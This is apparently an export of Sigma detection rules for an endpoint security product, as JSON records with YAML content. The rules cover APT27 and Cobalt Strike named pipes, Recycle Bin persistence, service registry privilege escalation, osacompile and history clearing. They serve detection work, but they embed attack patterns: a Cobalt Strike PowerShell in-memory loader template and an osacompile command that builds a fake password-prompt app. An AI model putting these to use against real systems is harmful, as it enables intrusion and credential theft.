"block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884", "rule_name": "File Deleted via shred", "rule_description": "Detects the execution of shred, a tool used to overwrite a file's content before deleting it.\nAttackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\nIt is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\n", "rule_creation_date": "2023-01-06", "rule_modified_date": "2026-02-11", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.impact" ], "rule_technique_tags": [ "attack.t1070.004", "attack.t1485" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.595420Z", "creation_date": "2026-03-23T11:45:34.595423Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.595431Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.intrinsec.com/apt27-analysis/", "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", "https://attack.mitre.org/techniques/T1106/" ], "name": "t1106_apt27_named_pipe_connection.yml", "content": "title: Suspicious APT27 Related Named Pipe Connected\nid: 0d4ebd0c-1c3f-4c6b-8c60-121639f8b842\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842", "rule_name": "Suspicious APT27 Related Named Pipe Connected", "rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n", "rule_creation_date": "2022-10-26", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1106", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085080Z", "creation_date": "2026-03-23T11:45:34.085082Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085086Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md", "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://attack.mitre.org/techniques/T1546/015/" ], "name": "t1546_015_recycle_bin_persistence.yml", "content": "title: Recycle Bin COM Object Modified\nid: 0d51dffe-a29c-4bbf-a33a-b2308e77bfda\ndescription: |\n Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\n The Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\n When this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\n Attackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\n It is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\nreferences:\n - https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md\n - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/04/24\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1546.015\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject|endswith: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda", "rule_name": "Recycle Bin COM Object Modified", "rule_description": "Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\nThe Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\nWhen this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\nAttackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\nIt is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\n", "rule_creation_date": "2025-04-24", "rule_modified_date": "2025-10-02", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1546.015" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d55020f-bbfc-470c-addf-f5feb6e37098", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.609954Z", "creation_date": "2026-03-23T11:45:34.609967Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.609975Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://attack.mitre.org/techniques/T1068/" ], "name": "t1068_registry_unprivileged_user_modifying_service_registry_config.yml", "content": "title: Service Registry Configuration Modified by an Unprivileged User\nid: 0d55020f-bbfc-470c-addf-f5feb6e37098\ndescription: |\n Detects a service registry configuration modification by an unprivileged user.\n Attackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\n It is recommended to investigate the modified registry key to look for paths pointing to malicious content.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n ProcessIntegrityLevel:\n - 'Low'\n - 'Medium'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\FailureCommand'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ServiceDll'\n\n exclusion_novell:\n # \\??\\C:\\Program Files\\Novell\\Client\\XTier\\Drivers\\nccache.sys\n Details|contains: ':\\Program Files\\Novell\\Client\\XTier\\Drivers\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d55020f-bbfc-470c-addf-f5feb6e37098", "rule_name": "Service Registry Configuration Modified by an Unprivileged User", "rule_description": "Detects a service registry configuration modification by an unprivileged user.\nAttackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\nIt is recommended to investigate the modified registry key to look for paths pointing to malicious content.\n", "rule_creation_date": "2022-09-07", "rule_modified_date": "2025-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1068", "attack.t1574.011" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d5af151-1912-4b7d-aa38-cacd25e43f67", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.296528Z", "creation_date": "2026-03-23T11:45:35.296531Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.296535Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1007/" ], "name": "t1007_net_start.yml", "content": "title: System Service Discovered via net.exe\nid: 0d5af151-1912-4b7d-aa38-cacd25e43f67\ndescription: |\n Detects the execution of net1.exe with start option.\n Adversaries can use this command during discovery phase to enumerate started system services.\n It is recommended to investigate the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|endswith: ' start'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - Ancestors|startswith:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\'\n\n exclusion_incotec:\n # https://www.incotec-software.com/\n - CurrentDirectory|contains: '\\Incotec\\Exec\\Bin'\n - Ancestors|contains: '|?:\\Incotec\\UNIX\\bin\\sh.exe|'\n\n exclusion_syracuse:\n - CurrentDirectory|endswith: '\\syracuse\\agent\\'\n - Ancestors|endswith: '\\syracuse\\agent\\Agent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_egurkha:\n CommandLine: '?:\\Windows\\system32\\net1 start'\n Ancestors|startswith: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_scripts:\n GrandparentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.cmd'\n Ancestors:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\taskeng.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_oracle:\n GrandparentCommandLine:\n - 'cmd.exe /x/d/c net start | find oracle /i'\n - 'cmd.exe /x/d/c net start | find oracleservice /i'\n Ancestors|contains: '|?:\\Perl64\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|'\n\n exclusion_datto:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_hexaflux:\n GrandparentCommandLine: '?:\\Windows\\system32\\cmd.exe /d /s /c net start | findstr Hexaflux'\n Ancestors|endswith: '\\hexaflux\\admin\\\\*|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\SAM\\RollCallSuite\\RollProxyConfigurator.exe|'\n - '|?:\\Program Files\\Dell\\SysMgt\\cm\\invcol\\invCol.exe|'\n - '|?:\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d5af151-1912-4b7d-aa38-cacd25e43f67", "rule_name": "System Service Discovered via net.exe", "rule_description": "Detects the execution of net1.exe with start option.\nAdversaries can use this command during discovery phase to enumerate started system services.\nIt is recommended to investigate the parent process to look for malicious content or other malicious actions.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2026-02-20", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1007" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e0dad90-5301-41c4-a880-808713de6f5d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618007Z", "creation_date": "2026-03-23T11:45:34.618009Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618014Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html", "https://attack.mitre.org/techniques/T1059/002/" ], "name": "t1059_002_osacompile_execution.yml", "content": "title: Apple Script Compiled via Osacompile\nid: 0e0dad90-5301-41c4-a880-808713de6f5d\ndescription: |\n Detects the execution of osacompile to compile an Apple Script.\n This could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\n It is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\nreferences:\n - https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osacompile\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # osacompile -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"' -o MaliciousApp.app\n selection:\n Image: '/usr/bin/osacompile'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e0dad90-5301-41c4-a880-808713de6f5d", "rule_name": "Apple Script Compiled via Osacompile", "rule_description": "Detects the execution of osacompile to compile an Apple Script.\nThis could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\nIt is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-01-20", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1569.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e0fd26d-b447-4686-acd2-ce93cce97b88", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091588Z", "creation_date": "2026-03-23T11:45:34.091590Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091595Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://gchq.github.io/CyberChef/", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/software/S0154/" ], "name": "t1059_001_cobalt_powershell_compress.yml", "content": "title: Cobalt Strike PowerShell Compressed Payload Detected\nid: 0e0fd26d-b447-4686-acd2-ce93cce97b88\ndescription: |\n Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n It is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand: '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"*\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e0fd26d-b447-4686-acd2-ce93cce97b88", "rule_name": "Cobalt Strike PowerShell Compressed Payload Detected", "rule_description": "Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nIt is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\n", "rule_creation_date": "2021-11-22", "rule_modified_date": "2025-04-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e12c12e-bea2-428e-ad86-734dcc2aff20", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.073062Z", "creation_date": "2026-03-23T11:45:34.073064Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.073069Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/", "https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py", "https://attack.mitre.org/techniques/T1021/002/" ], "name": "t1021_002_custom_cobaltstrike_named_pipes_created.yml", "content": "title: Custom CobaltStrike Named Pipe Created\nid: 0e12c12e-bea2-428e-ad86-734dcc2aff20\ndescription: |\n Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e12c12e-bea2-428e-ad86-734dcc2aff20", "rule_name": "Custom CobaltStrike Named Pipe Created", "rule_description": "Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n", "rule_creation_date": "2022-07-08", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.002", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598235Z", "creation_date": "2026-03-23T11:45:34.598241Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598253Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1070/003/" ], "name": "t1070_003_history_file_removed_macos.yml", "content": "title: Shell History File Cleared (macOS)\nid: 0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb\ndescription: |\n Detects the history file being removed.\n Attackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\n It is recommended to investigate other malicious actions that may have been taken by the parent 